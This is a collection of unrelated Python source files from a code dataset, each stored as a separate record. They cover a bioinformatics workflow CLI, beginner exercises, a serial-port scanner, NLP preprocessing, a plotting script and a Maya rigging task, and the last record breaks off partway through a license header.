+{"seq_id":"249746099","text":"\"\"\"Add CLI support to start microsalt\"\"\"\n\nimport json\nimport logging\nfrom pathlib import Path\nimport subprocess\n\nimport click\n\nfrom cg.apps import hk, lims\nfrom cg.apps.usalt.fastq import FastqHandler\nfrom cg.cli.workflow.microsalt.store import store as store_cmd\nfrom cg.cli.workflow.microsalt.deliver import (\n deliver as deliver_cmd,\n PROJECT_TAGS,\n SAMPLE_TAGS,\n)\nfrom cg.meta.microsalt.lims import LimsMicrosaltAPI\nfrom cg.meta.workflow.microsalt import AnalysisAPI\nfrom cg.meta.deliver import DeliverAPI\nfrom cg.store import Store\n\nLOG = logging.getLogger(__name__)\n\n\n@click.group(\"microsalt\", invoke_without_command=True)\n@click.option(\"-o\", \"--order\", \"order_id\", help=\"include all microbial samples for an order\")\n@click.pass_context\ndef microsalt(context: click.Context, order_id):\n \"\"\"Microbial workflow\"\"\"\n context.obj[\"db\"] = Store(context.obj[\"database\"])\n hk_api = hk.HousekeeperAPI(context.obj)\n lims_api = lims.LimsAPI(context.obj)\n deliver = DeliverAPI(\n context.obj,\n hk_api=hk_api,\n lims_api=lims_api,\n case_tags=PROJECT_TAGS,\n sample_tags=SAMPLE_TAGS,\n )\n context.obj[\"api\"] = AnalysisAPI(db=context.obj[\"db\"], hk_api=hk_api, lims_api=lims_api)\n context.obj[\"lims_microsalt_api\"] = LimsMicrosaltAPI(lims=lims_api)\n\n if context.invoked_subcommand is None:\n if order_id is None:\n LOG.error(\"Please provide an order\")\n context.abort()\n else:\n # execute the analysis!\n context.invoke(config_case, order_id=order_id)\n context.invoke(link, order_id=order_id)\n context.invoke(run, order_id=order_id)\n\n\n@microsalt.command()\n@click.option(\"-o\", \"--order\", \"order_id\", help=\"link all microbial samples for an order\")\n@click.argument(\"sample_id\", required=False)\n@click.pass_context\ndef link(context: click.Context, order_id: str, sample_id: str):\n \"\"\"Link microbial FASTQ files for a SAMPLE_ID\"\"\"\n sample_objs = None\n\n if order_id and (sample_id is None):\n # link all samples in a case\n sample_objs = context.obj[\"db\"].microbial_order(order_id).microbial_samples\n elif sample_id and (order_id is None):\n # link sample in all its families\n sample_objs = [context.obj[\"db\"].microbial_sample(sample_id)]\n elif sample_id and order_id:\n # link only one sample in a case\n sample_objs = [context.obj[\"db\"].microbial_sample(sample_id)]\n\n if not sample_objs:\n LOG.error(\"provide order and/or sample\")\n context.abort()\n\n for sample_obj in sample_objs:\n LOG.info(\"%s: link FASTQ files\", sample_obj.internal_id)\n context.obj[\"api\"].link_sample(\n FastqHandler(context.obj),\n case=sample_obj.microbial_order.internal_id,\n sample=sample_obj.internal_id,\n )\n\n\n@microsalt.command(\"config-case\")\n@click.option(\"-d\", \"--dry\", is_flag=True, help=\"print config-case to console\")\n@click.option(\n \"-o\", \"--order\", \"order_id\", help=\"create config-case all microbial samples for an order\",\n)\n@click.argument(\"sample_id\", required=False)\n@click.pass_context\ndef config_case(context: click.Context, dry, order_id: str, sample_id: str):\n \"\"\" Create a config file on case level for microSALT \"\"\"\n if order_id and (sample_id is None):\n microbial_order_obj = context.obj[\"db\"].microbial_order(order_id)\n if not microbial_order_obj:\n LOG.error(\"Order %s not found\", order_id)\n context.abort()\n sample_objs = microbial_order_obj.microbial_samples\n elif sample_id and (order_id is None):\n sample_obj = context.obj[\"db\"].microbial_sample(sample_id)\n if not sample_obj:\n LOG.error(\"Sample %s not found\", sample_id)\n context.abort()\n sample_objs = [context.obj[\"db\"].microbial_sample(sample_id)]\n elif sample_id and order_id:\n microbial_order_obj = context.obj[\"db\"].microbial_order(order_id)\n if not microbial_order_obj:\n LOG.error(\"Samples %s not found in %s \", sample_id, order_id)\n context.abort()\n sample_objs = [\n sample_obj\n for sample_obj in microbial_order_obj.microbial_samples\n if sample_obj.internal_id == sample_id\n ]\n else:\n LOG.error(\"provide order and/or sample\")\n context.abort()\n\n parameters = [\n context.obj[\"lims_microsalt_api\"].get_parameters(sample_obj) for sample_obj in sample_objs\n ]\n\n filename = order_id if order_id else sample_id\n outfilename = Path(context.obj[\"usalt\"][\"queries_path\"]) / filename\n outfilename = outfilename.with_suffix(\".json\")\n if dry:\n print(json.dumps(parameters, indent=4, sort_keys=True))\n else:\n with open(outfilename, \"w\") as outfile:\n json.dump(parameters, outfile, indent=4, sort_keys=True)\n\n\n@microsalt.command()\n@click.option(\"-d\", \"--dry\", is_flag=True, help=\"print command to console\")\n@click.option(\"-c\", \"--config-case\", required=False, help=\"optionally change the config-case\")\n@click.argument(\"order_id\")\n@click.pass_context\ndef run(context, dry, config_case, order_id):\n \"\"\" Start microSALT with an order_id \"\"\"\n microsalt_command = context.obj[\"usalt\"][\"binary_path\"]\n command = [microsalt_command]\n\n config_case_path = config_case\n if not config_case:\n queries_path = Path(context.obj[\"usalt\"][\"queries_path\"])\n config_case_path = queries_path / order_id\n config_case_path = config_case_path.with_suffix(\".json\")\n\n command.extend([\"--parameters\", str(config_case_path)])\n if dry:\n print(\" \".join(command))\n else:\n LOG.info(\"Starting microSALT! '%s'\", \" \".join(command))\n subprocess.run(command, shell=True, check=True)\n\n\nmicrosalt.add_command(config_case)\nmicrosalt.add_command(deliver_cmd)\nmicrosalt.add_command(run)\nmicrosalt.add_command(store_cmd)\n","sub_path":"cg/cli/workflow/microsalt/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"264435829","text":"'''\n Fantasy Game Inventory\n\n You are creating a fantasy video game. The data structure to model the\n player’s inventory will be a dictionary where the keys are string values\n describing the item in the inventory and the value is an integer value detailing how many of that item the player has. For example, the dictionary value\n {'rope': 1, 'torch': 6, 'gold coin': 42, 'dagger': 1, 'arrow': 12} means the\n player has 1 rope, 6 torches, 42 gold coins, and so on.\n Write a function named displayInventory() that would take any possible\n “inventory” and display it like the following:\n\n Inventory:\n 12 arrow\n 42 gold coin\n 1 rope\n 6 torch\n 1 dagger\n Total number of items: 62\n\n'''\ninventory = {'rope': 1, 'torch': 6, 'gold coin': 42, 'dagger': 1, 'arrow': 12}\n\n\ndef display_inventory(items):\n total = 0\n\n print('Inventory:')\n for key, value in items.items(): # [('rope', 1), ('gold coin', 42), ('torch', 6), ('dagger', 1), ('arrow', 12)]\n print(str(value) + ' ' + str(key))\n total += value\n\n print('Toal number of items: ' + str(total))\n\ndisplay_inventory(inventory)\n\n\n\nimport collections\n\ninv = {'gold coin': 42, 'rope': 1}\ndragon_loot = ['gold coin', 'dagger', 'gold coin', 'gold coin', 'ruby']\n\ndef add_to_inventory(inventory, added_items):\n collected_items = {}\n\n for item in added_items:\n collected_items.setdefault(item, 0)\n collected_items[item] = collected_items[item] + 1\n\n item_total = collections.Counter(collected_items)\n add_inv = collections.Counter(inventory)\n\n return item_total + add_inv\n\n\nsummed_inventory = add_to_inventory(inv, dragon_loot)\ndisplay_inventory(summed_inventory)\n","sub_path":"ATBSWP-projects/fantasy-game-inventory.py","file_name":"fantasy-game-inventory.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"632099783","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n lantz-scan\n ~~~~~~~~~~\n\n Serial port scanner.\n\n :copyright: 2012 by Lantz Authors, see AUTHORS for more details.\n :license: BSD, see LICENSE for more details.\n\"\"\"\n\nimport serial\n\ndef scan(ports=None, verbose=False):\n \"\"\"Scan for available ports.\n\n :param ports: an iterable of device names or port number numbers.\n if None, ports 0 to 9 is given.\n :param verbose: print status.\n :return: return a list of tuples (identification, name)\n \"\"\"\n\n if not ports:\n ports = range(10)\n\n if verbose:\n _print = print\n else:\n def _print(*args, **kwargs):\n pass\n\n for port in ports:\n try:\n _print('Trying {} ... '.format(port), end='')\n s = serial.Serial(port)\n yield port, s.portstr\n s.close()\n _print('success (port string: {}'.format(s.portstr))\n except serial.SerialException:\n _print('failed!')\n pass\n\nif __name__=='__main__':\n import sys\n import argparse\n\n parser = argparse.ArgumentParser(description='Tries to open serial ports and print the valid ones.')\n parser.add_argument('ports', metavar='ports', type=str, nargs='*', default=None,\n help='Ports to open. Ranges (e.g. 0-3, meaning 0, 1, 2, 3 are also possible.')\n args = parser.parse_args()\n\n if args.ports:\n try:\n ports = set()\n for port in args.ports:\n if '-' in port:\n fr, to = port.split('-')\n ports.update(range(int(fr), int(to)+1))\n else:\n try:\n ports.add(int(port))\n except ValueError:\n ports.add(port)\n except Exception as e:\n print('Could no parse input {}: {}'.format(port, e))\n sys.exit(1)\n else:\n ports = list(range(0, 10))\n\n print(\"Testing ports ...\")\n\n number = len(tuple(scan(ports, verbose=True)))\n\n print('{} ports found'.format(number + 1))\n","sub_path":"scripts/lantz-scan.py","file_name":"lantz-scan.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"262988939","text":"\"\"\"preprocess.py: Contains general preprocessing functions for textual data\"\"\"\n\nimport spacy\nfrom gensim.models import Word2Vec as word2vec\nimport numpy as np\n\nnp.random.seed(1234)\n\n# A dict of some additional special words\nX_WORDS = {\"unknown\": \"<unk>\", \"start\": \"<start>\", \"end\": \"<end>\", \"digit\": \"<digit>\"}\n\n# Loads the spacy model\nparser = spacy.load('en_core_web_md')\n\n\ndef tokenizer(sentence):\n \"\"\"\n Tokenizes a sentence using spacy models.\n \n :param sentence: str \n :returns tokens: list\n \"\"\"\n doc = parser(sentence)\n tokens = [word.text for word in doc] # get a list of tokenized tokens\n return tokens\n\n\ndef add_boundary_tags(tokens):\n \"\"\"\n Adds start and end tags to list of tokens\n \n :param tokens: list: list of tokenized words\n :returns str: [<start>, w1, w2...., wn, <end>]\n \"\"\"\n return [X_WORDS[\"start\"]] + tokens + [X_WORDS[\"end\"]]\n\n\ndef preprocess(documents, to_lower=True, boundary_tags=False):\n \"\"\"\n Preprocesses raw text - convert into lowercase add boundary tags\n \n :param documents: list: of str\n :param to_lower: bool: whether to convert text into lowercase(default=True)\n :param boundary_tags: bool: whether to keep boundary tags or not(start, end)\n :returns processed: list: of list: of str: a list of lists of words\n \"\"\"\n processed = list() \n \n for doc in documents:\n \n # Convert into lowercase if flag is set\n if to_lower:\n doc = doc.lower()\n tokens = tokenizer(doc)\n if boundary_tags:\n tokens = add_boundary_tags(tokens)\n processed.append(tokens)\n \n return processed\n\n\ndef to_indices(documents, to_ix):\n \"\"\"\n Converts documents into a list of indices.\n \n :param documents: list: of list: of str: a list of lists of words\n :param to_ix: dict: a word to index mapping\n :returns indices: list: of list: of int: a list of lists of word indices\n \"\"\" \n indices = list()\n \n for doc in documents:\n tokens = list()\n for word in doc:\n try:\n # Look for the word in dict\n tokens.append(to_ix[word])\n except:\n # If not found then add a special word for unknown\n tokens.append(to_ix[X_WORDS[\"unknown\"]])\n indices.append(tokens)\n \n return indices\n\n\ndef w2v_word_mapping(model_path):\n \"\"\"\n Returns mapping of words to indices and vice-versa.\n In addition to a numpy matrix representation of\n pre-trained word vectors with gensim.\n \n :param model_path: str: Relative path to the pre-trained gensim model \n :returns (word_vectors: np.array: of float: A matrix representation of gensim word vectors,\n index_to_word: list: Index to word mapping,\n word_to_index: dict: Word to Index mapping)\n \"\"\"\n \n # Load Word Vector Model and get a list of vocab\n wv_model = word2vec.load(model_path)\n index_to_word = list(wv_model.wv.vocab.keys())\n \n word_vectors = list()\n \n # Populate matrix of word vectors\n for word in index_to_word:\n word_vectors.append(wv_model[word])\n \n # Add a special words(unknow, start, end)\n index_to_word += X_WORDS.values()\n \n # Create a reverse mapping for words\n word_to_index = dict((word, idx) for idx, word in enumerate(index_to_word)) \n \n for word in X_WORDS:\n # A random_vector for special words\n random_vector = np.random.rand(wv_model.vector_size)\n word_vectors.append(random_vector)\n \n return np.array(word_vectors), index_to_word, word_to_index\n\n\ndef data_word_mapping(documents):\n \"\"\"\n Returns unique words in a list of strings\n \n :param documents: list: a list of strings \n :returns (None, index_to_word: list: Index to word mapping,\n word_to_index: dict: Word to Index mapping)\n \"\"\"\n \n # If type of documents is a list of words then join them together\n if type(documents[0]) == list:\n documents = [\" \".join(doc) for doc in documents]\n \n vocab = (\" \".join(documents).split()) + [X_WORDS[\"unknown\"]] # End tags will already be there\n index_to_word = np.unique(vocab)\n word_to_index = dict((word, idx) for idx, word in enumerate(index_to_word))\n \n return None, index_to_word, word_to_index\n\n\ndef get_word_mappings(documents=None, w2v_path=None):\n \"\"\"\n Returns mapping of words to indices and vice-versa.\n If the `w2v_path` is given then this will also return \n a numpy matrix representation of pre-trained word vectors with gensim.\n \n :param documents: list: of str: a list of documents/sentences/paragraphs\n :param w2v_path: str: Relative path for pre-trained gensim model\n \n :returns (word_vectors: np.array: of float: A matrix representation of gensim word vectors,\n index_to_word: list: Index to word mapping,\n word_to_index: dict: Word to Index mapping)\n \"\"\"\n if documents:\n return data_word_mapping(documents)\n elif w2v_path:\n return w2v_word_mapping(w2v_path)\n else:\n print(\"Provide either a list of documents or path to a pre-trained gensim model.\")\n \n \ndef train_test_split(dataset, test_size=0.10):\n \"\"\"\n Splits the dataset into training and test sets.\n Each element of 'dataset' has to be a tuple where\n first index is input for the model and second index contains output.\n \n :param dataset: tuple: of (list, list): a tuple with one input and output sample\n :param test_size: int/float: if a float value is given than that portion of 'dataset'(default=0.10)\n will be made the test size. An integer value simply represents the count of test samples/\n :returns (train_data: tuple: of (list, list), test_data: tuple: of (list, list)) \n \"\"\"\n # Let there be some randomness\n np.random.shuffle(dataset)\n \n # If test_size is float then get number of sample for that proportion\n if type(test_size) == float:\n test_size = int(len(dataset) * test_size)\n\n test_data = dataset[:test_size]\n train_data = dataset[test_size:]\n \n return train_data, test_data","sub_path":"projects/Word2Vec/scripts/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":6170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"483078363","text":"import numpy as np\nimport matplotlib\nmatplotlib.use('Qt5Agg')\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport subprocess # better than os.system()\n\n# harvest data\n\n# subdirname = 'fullUpwindIBL_fullUpwindTr'\n# subdirname = 'LFIBL_fullUpwindTr'\n# subdirname = 'straightManifold_fullUpwind_p0' # good\n# subdirname = 'straightManifold_fullUpwind_p1' # good\n\n# subdirname = 'curvedManifold_fullUpwind_p0_avgTraceNormal'\n# subdirname = 'curvedManifold_fullUpwind_p0_sepTraceNormal'\n# subdirname = 'curvedManifold_fullUpwind_p0_sepTraceNormal_upstreamNrm' # good\nsubdirname = 'curvedManifold_fullUpwind_p1_sepTraceNormal_upstreamNrm' # good\n\n# order_soln = 0\norder_soln = 1\n\nif order_soln == 0:\n nDOF = 24\nelif order_soln == 1:\n nDOF = 36\nelse:\n raise AssertionError('not supported!')\n\nindx_rsd = 33 # index of residual component to be examined\n\nexponent_array = np.arange(-12, -2, 1)\n\nxtrrel_plus = np.ndarray(exponent_array.size)\nresdat_plus = np.ndarray([xtrrel_plus.size, nDOF])\n\nxtrrel_minus = np.ndarray(exponent_array.size)\nresdat_minus = np.ndarray([xtrrel_minus.size, nDOF])\n\nresdat_zero = np.genfromtxt('/Users/shunz/Workstation/SANSdevelop/test/sandbox/tmp/%s/' % subdirname\n + 'rsdInit_forcedTransition_xtr0p7054156_p%d.txt' % order_soln)\n\nfor j in range(exponent_array.size):\n exponent = exponent_array[j]\n\n filename = '/Users/shunz/Workstation/SANSdevelop/test/sandbox/tmp/%s/' % subdirname + \\\n 'rsdInit_forcedTransition_xtr0p7054156m1em%d_p%d.txt' % (abs(exponent), order_soln)\n xtrrel_minus[j] = -pow(10.0, exponent)\n resdat_minus[j, :] = np.genfromtxt(filename)\n\n filename = '/Users/shunz/Workstation/SANSdevelop/test/sandbox/tmp/%s/' % subdirname + \\\n 'rsdInit_forcedTransition_xtr0p7054156p1em%d_p%d.txt' % (abs(exponent), order_soln)\n xtrrel_plus[j] = +pow(10.0, exponent)\n resdat_plus[j, :] = np.genfromtxt(filename)\n\n# examine residual\n\n# print residual\nprint(\"resdat_minus: \", resdat_minus[:, indx_rsd])\nprint(\"resdat_zero : \", resdat_zero[indx_rsd])\nprint(\"resdat_plus : \", resdat_plus[:, indx_rsd])\n\n# plot residual\n\nplt.rc('text', usetex=True)\nplt.rc('font', family='Times New Roman')\n# plt.rcParams[\"figure.figsize\"] = [16, 9]\n\nplt.figure(1, figsize=[12, 7])\n\nax1 = plt.subplot(2, 2, 1)\ncp = plt.plot(xtrrel_minus, resdat_minus[:, indx_rsd], 'b+-')\nplt.plot(0.0, resdat_zero[indx_rsd], 'ro-')\nplt.plot(xtrrel_minus, np.zeros(exponent_array.size), 'k--')\nplt.xscale('symlog', linthreshx=1e-12)\nplt.yscale('symlog', linthreshy=1e-17)\n\nplt.title('Residual \\#%d' % indx_rsd)\nplt.xlabel(r'$x_\\textrm{tr} - x_\\textrm{interface}$')\nplt.ylabel('Residual')\n\n# ax = plt.gca()\nax1.yaxis.set_major_locator(ticker.SymmetricalLogLocator(base=10, linthresh=np.min(np.abs(resdat_minus[:, indx_rsd]))))\nax1.yaxis.set_major_formatter(ticker.LogFormatterSciNotation(base=10))\n\nplt.subplot(2, 2, 3, sharex=ax1)\ncp = plt.plot(xtrrel_minus, np.abs(resdat_minus[:, indx_rsd]), 'b+-')\nplt.plot(0.0, abs(resdat_zero[indx_rsd]), 'ro-')\nplt.xscale('symlog', linthreshx=1e-12)\nplt.yscale('log')\n\nplt.title('Residual \\#%d' % indx_rsd)\nplt.xlabel(r'$x_\\textrm{tr} - x_\\textrm{interface}$')\nplt.ylabel('Residual Magnitude')\n\n# plt.axis('equal')\nplt.tight_layout()\n\n# plt.figure(2)\n\nax2 = plt.subplot(2, 2, 2)\nplt.plot(xtrrel_plus, resdat_plus[:, indx_rsd], 'b+-')\n\nif False: # only available in LFIBL_fullUpwindTr for index = 24\n subs_finer_array = np.linspace(1, 10, 10, endpoint=True, dtype=float)\n xtrrel_plus_finer = np.ndarray(subs_finer_array.size)\n resdat_plus_finer = np.ndarray([xtrrel_plus_finer.size, nDOF])\n\n for j in range(subs_finer_array.size):\n subs = subs_finer_array[j]\n filename = '/Users/shunz/Workstation/SANSdevelop/test/sandbox/tmp/%s/' % subdirname + \\\n 'rsdInit_forcedTransition_xtr0p7054156p%dem7.txt' % int(subs)\n xtrrel_plus_finer[j] = subs*1e-7\n resdat_plus_finer[j, :] = np.genfromtxt(filename)\n\n print(\"resdat_plus_finer : \", resdat_plus_finer[:, indx_rsd])\n\n plt.plot(xtrrel_plus_finer, resdat_plus_finer[:, indx_rsd], 'bx-')\n\nplt.plot(0.0, resdat_zero[indx_rsd], 'ro-')\nplt.plot(xtrrel_plus, np.zeros(exponent_array.size), 'k--')\nplt.xscale('symlog', linthreshx=1e-12)\nplt.yscale('symlog', linthreshy=1e-17)\n\nplt.title('Residual \\#%d' % indx_rsd)\nplt.xlabel(r'$x_\\textrm{tr} - x_\\textrm{interface}$')\nplt.ylabel('Residual')\n\nax2.yaxis.set_major_locator(ticker.SymmetricalLogLocator(base=10, linthresh=np.min(np.abs(resdat_plus[:, indx_rsd]))))\nax2.yaxis.set_major_formatter(ticker.LogFormatterSciNotation(base=10))\n\nplt.subplot(2, 2, 4, sharex=ax2)\nplt.plot(xtrrel_plus, np.abs(resdat_plus[:, indx_rsd]), 'b+-')\nplt.plot(0.0, abs(resdat_zero[indx_rsd]), 'ro-')\nplt.xscale('symlog', linthreshx=1e-12)\nplt.yscale('log')\n\nplt.title('Residual \\#%d' % indx_rsd)\nplt.xlabel(r'$x_\\textrm{tr} - x_\\textrm{interface}$')\nplt.ylabel('Residual Magnitude')\n\n# plt.axis('equal')\nplt.tight_layout()\n\nplt.show()\n\n# plt.gcf().set_size_inches(w=14, h=7)\n\nif True:\n filenamefig = 'residualVariation_rsd%d.eps' % indx_rsd\n plt.gcf().savefig(filenamefig, format='eps')\n\n # os.system(\"epstopdf %s\" % filenamefig)\n subprocess.call([\"epstopdf\", filenamefig])\n subprocess.call([\"rm\", filenamefig])\n","sub_path":"cutcellResidualSmoothnessCheck.py","file_name":"cutcellResidualSmoothnessCheck.py","file_ext":"py","file_size_in_byte":5293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"397913986","text":"\"\"\"\n # FKIK fingers\n rig.fingerFKIKSetup(fingerNames=[\"Index\", \"Middle\", \"Ring\", \"Pinky\", \"Thumb\"], sides=[\"L\", \"R\"])\n\n # Rig control modifications\n modify.masterControl(controlScale=1.0)\n modify.bodyControl(controlScale=1.0)\n modify.cogControl(controlScale=1.0)\n modify.hipSwinger(controlScale=1.0)\n modify.fkikControls(controlScale=1.0)\n modify.curveControlColors()\n\n\n # FOOT MOD\n# IK Foot Modification - Use attributes to control foot pivots instead of controls\nfoot_ctl = 'lf_leg_ik_ctl'\n\n# Add attrs\nfoot_attrs = [ 'footTilt', 'heelBall', 'heelBallAngle', 'toesUpDn', 'ballSwivel', 'heelSwivel', ]\n\nfor foot_attr in foot_attrs:\n cmds.addAttr(foot_ctl, ln=foot_attr, dv=0, at='double')\n cmds.setAttr('{}.{}'.format(foot_ctl, foot_attr), k=True, l=False)\n\ncmds.setAttr('{}.heelBallAngle'.format(foot_ctl), 25)\n\n# Connect foot attrs\ncmds.connectAttr( '{}.footTilt'.format(foot_ctl), '{}.rock'.format(foot_ctl) )\ncmds.connectAttr( '{}.heelBall'.format(foot_ctl), '{}.roll'.format(foot_ctl) )\ncmds.connectAttr( '{}.heelBallAngle'.format(foot_ctl), '{}.rollAngle'.format(foot_ctl) )\ncmds.connectAttr( '{}.toesUpDn'.format(foot_ctl), 'lf_toes_ik_ctl.rx'.format(foot_ctl) )\n#cmds.connectAttr( '{}.ballSwivel'.format(foot_ctl), '{}.roll'.format(foot_ctl) )\ncmds.connectAttr( '{}.heelSwivel'.format(foot_ctl), 'lf_heelSwing_ctl.ry'.format(foot_ctl) )\n\n# Hide existing attrs\nfoot_attrs_hide = ['swivel', 'roll', 'rollAngle', 'rock']\nfor foot_attr_hide in foot_attrs_hide:\n cmds.setAttr('{}.{}'.format(foot_ctl, foot_attr_hide), k=False, l=False)\n\n# Hide existing controls\ncmds.hide('lf_IKOffsettoes', 'lf_heelSwing_ctl', 'lf_rollHeel_ctlShape')\n\n\nFootTilt = Existing \"Rock\" attr\nHeelBall = Existing \"Roll\" attr\nToesUpDn = 'lf_toes_ik_ctl.rx'\nBallSwivel =\nHeelSwivel = Existing \"Swivel\" attr\nToeCtl = lf_rolltoesEnd_ctl\n\n\"\"\"\n\nimport os\nimport json\n\nimport maya.cmds as cmds\nimport maya.mel as mel\n\nimport py_tasker.tasks\nimport dragonfly.modules\nreload(dragonfly.modules)\n\nLOG = py_tasker.tasks.get_task_logger(__name__)\nMAYA_VER = int(mel.eval('getApplicationVersionAsFloat'))\nCONTROLS_DIRECTORY = os.path.join(os.path.dirname(__file__), 'controls')\n\n\ndef run(params, rig):\n\n for footIK in params['footIKControls']:\n\n footIK_ctl = footIK['footIKControl']\n\n LOG.info('Modifying footIK pivot controls on {}'.format(footIK_ctl))\n\n # Get controls\n toe_ctl = return_foot_node(footIK_ctl, search_str='IKToes_')\n\n # Add attr separator\n attributeSeparator(footIK_ctl, \"FootPivots\")\n\n # Add new foot attrs\n foot_attrs = ['footTilt', 'heelBall', 'heelBallAngle', 'toesUpDn', 'ballSwivel', 'heelSwivel', ]\n\n for foot_attr in foot_attrs:\n cmds.addAttr(footIK_ctl, ln=foot_attr, dv=0, at='double')\n cmds.setAttr('{}.{}'.format(footIK_ctl, foot_attr), k=True, l=False)\n\n cmds.setAttr('{}.heelBallAngle'.format(footIK_ctl), 25)\n\n # Connect new foot attrs to existing foot attrs\n cmds.connectAttr('{}.footTilt'.format(footIK_ctl), '{}.rock'.format(footIK_ctl))\n cmds.connectAttr('{}.heelBall'.format(footIK_ctl), '{}.roll'.format(footIK_ctl))\n cmds.connectAttr('{}.heelBallAngle'.format(footIK_ctl), '{}.rollAngle'.format(footIK_ctl))\n if toe_ctl:\n cmds.connectAttr('{}.toesUpDn'.format(footIK_ctl), '{}.rx'.format(toe_ctl))\n ball_pivot = add_ball_pivot_node(footIK_ctl)\n cmds.connectAttr( '{}.ballSwivel'.format(footIK_ctl), '{}.ry'.format(ball_pivot) )\n heel_pivot = add_heel_pivot_node(footIK_ctl)\n cmds.connectAttr('{}.heelSwivel'.format(footIK_ctl), '{}.ry'.format(heel_pivot))\n\n\n # Hide existing attrs\n foot_attrs_hide = ['swivel', 'roll', 'rollAngle', 'rock']\n for foot_attr_hide in foot_attrs_hide:\n cmds.setAttr('{}.{}'.format(footIK_ctl, foot_attr_hide), k=False, l=False)\n\n # Hide existing controls\n ctls_to_hide = cmds.listRelatives(footIK_ctl, ad=True, type='nurbsCurve')\n\n if 'Front' in footIK_ctl:\n hide_strings = ['IKFrontPaw', 'IKOffsetFrontPaw', 'RollfrontHeel', 'RollToe', 'HeelSwing', 'RollPaws']\n elif 'Back' in footIK_ctl:\n hide_strings = ['IKBackPaw', 'IKOffsetBackPaw', 'RollbackHeel', 'RollToe', 'HeelSwing', 'RollPaw']\n else:\n hide_strings = ['IKToes', 'IKOffsettoes', 'RollHeel', 'RollToes', 'HeelSwing']\n\n for ctl in ctls_to_hide:\n for hide_str in hide_strings:\n if hide_str in ctl:\n cmds.hide(ctl)\n\n # Show specific controls\n show_strings = ['RollToesEnd']\n for ctl in ctls_to_hide:\n for show_str in show_strings:\n if show_str in ctl:\n cmds.showHidden(ctl)\n\n\n LOG.info('Successfully modified footIK pivot controls on {}'.format(footIK_ctl))\n\n\ndef add_heel_pivot_node(foot_ik_ctl):\n \"\"\"Adds a pivot transform at ball of foot\n\n Example:\n add_heel_pivot_node('IKLeg_L')\n \"\"\"\n # Create new transform\n cmds.select(clear=True)\n heel_pivot = cmds.group(name='{}_heel_pivot'.format(foot_ik_ctl), empty=True)\n\n if 'Front' in foot_ik_ctl:\n match_pivot = return_foot_node(foot_ik_ctl, search_str='RollOffsetfrontHeel_')\n elif 'Back' in foot_ik_ctl:\n match_pivot = return_foot_node(foot_ik_ctl, search_str='RollOffsetbackHeel_')\n else:\n match_pivot = return_foot_node(foot_ik_ctl, search_str='RollOffsetHeel_')\n\n cmds.delete(cmds.pointConstraint(match_pivot, heel_pivot))\n ik_child = cmds.listRelatives(foot_ik_ctl, children=True, type='transform')\n cmds.parent(heel_pivot, foot_ik_ctl)\n cmds.parent(ik_child, heel_pivot)\n return heel_pivot\n\n\ndef add_ball_pivot_node(foot_ik_ctl):\n \"\"\"Adds a pivot transform at ball of foot\n\n Example:\n add_ball_pivot_node('IKLeg_L')\n \"\"\"\n # Create new transform\n cmds.select(clear=True)\n ball_pivot = cmds.group(name='{}_ball_pivot'.format(foot_ik_ctl), empty=True)\n inner_pivot = return_foot_node(foot_ik_ctl, search_str='RockInnerPivot_')\n outer_pivot = return_foot_node(foot_ik_ctl, search_str='RockOuterPivot_')\n cmds.delete(cmds.pointConstraint(inner_pivot, outer_pivot, ball_pivot))\n ik_child = cmds.listRelatives(foot_ik_ctl, children=True, type='transform')\n cmds.parent(ball_pivot, foot_ik_ctl)\n cmds.parent(ik_child, ball_pivot)\n return ball_pivot\n\n\ndef return_foot_node(foot_ik_ctl, search_str=\"\"):\n \"\"\"Simple function to help find foot nodes in a footIK ctl hiearchy\n\n return_foot_node( 'IKLeg_L', search_str='IKToes_')\n \"\"\"\n foot_nodes = cmds.listRelatives(foot_ik_ctl, ad=True, type='transform')\n for foot_node in foot_nodes:\n if search_str in foot_node:\n return foot_node\n\n\ndef attributeSeparator(control, attr):\n \"\"\"Create a separator attribute on the specified control object\n\n Args:\n control: The control to add the separator attribute to\n attr: The separator attribute name\n\n Returns:\n string: control.attr\n\n Example:\n attributeSeparator('Lf_arm_ctrl', '___')\n \"\"\"\n # Check control\n if not cmds.objExists(control):\n raise Exception('Control object \"' + control + '\" does not exist!')\n\n # Check attribute\n if cmds.objExists(control + '.' + attr):\n raise Exception('Control attribute \"' + control + '.' + attr + '\" already exists!')\n\n # Create attribute\n cmds.addAttr(control, ln=attr, at='enum', en=':-:')\n cmds.setAttr(control + '.' + attr, cb=True)\n cmds.setAttr(control + '.' + attr, l=True)\n\n # Return result\n return (control + '.' + attr)","sub_path":"src/maya_toolkit/dragonfly/plugins/as_modifyFootIK.task/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":7659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"348984166","text":"import pprint\n\nmessage = input('Please type any message here, the longer the better!\\n')\ncount = {}\n\nfor character in message:\n count.setdefault(character, 0)\n count[character] = count[character] + 1\n\n#print(pprint.pformat(count))\npprint.pprint(count)\n","sub_path":"count-characters.py","file_name":"count-characters.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"510559536","text":"# MIT LICENSE\n#\n# Copyright 1997 - 2020 by IXIA Keysight\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, 